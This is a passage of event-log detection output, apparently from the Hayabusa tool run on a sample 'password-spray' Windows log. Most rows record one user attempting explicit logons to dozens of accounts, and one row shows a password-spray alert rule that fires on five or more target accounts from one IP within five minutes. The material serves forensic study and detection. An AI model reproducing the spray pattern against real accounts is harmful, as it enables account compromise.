User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:54.668 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:55.714 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:56.768 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:57.850 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:30:58.920 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:00.029 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:01.113 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:02.172 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:03.238 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:04.300 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:05.378 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:06.439 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:07.513 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:08.581 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:09.674 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:10.754 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:11.843 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:12.917 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:13.987 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:15.045 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:16.136 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:17.201 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:18.302 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:19.372 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:20.450 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:21.552 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:22.656 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:23.749 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:24.832 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:25.919 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:26.998 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:28.103 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:29.187 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:30.262 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:31.362 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:32.419 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:33.499 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:34.577 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:35.670 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:36.716 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:37.815 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:38.872 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:39.954 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:41.028 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:42.075 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:43.142 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:44.208 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:45.284 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:46.379 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:47.433 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:48.512 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:49.576 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:50.656 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:51.729 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:52.823 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:53.886 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:54.942 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:56.019 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:57.107 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:58.193 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:59.253 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:00.320 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:01.393 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:02.451 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:03.525 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:03.525 +00:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:jlake/bking/cspizor/cragoso/dmashburn/bgalbraith/smisenar/bgreenwood/jorchilles/mdouglas/ssims/baker/drook/edygert IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,- +2019-04-30 19:32:04.597 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:05.675 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | 
IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:06.738 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:07.835 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:08.911 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:09.973 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:11.051 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:12.146 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 
172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:13.221 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:14.281 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:15.352 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:16.402 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:17.474 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 20:26:51.793 +00:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 
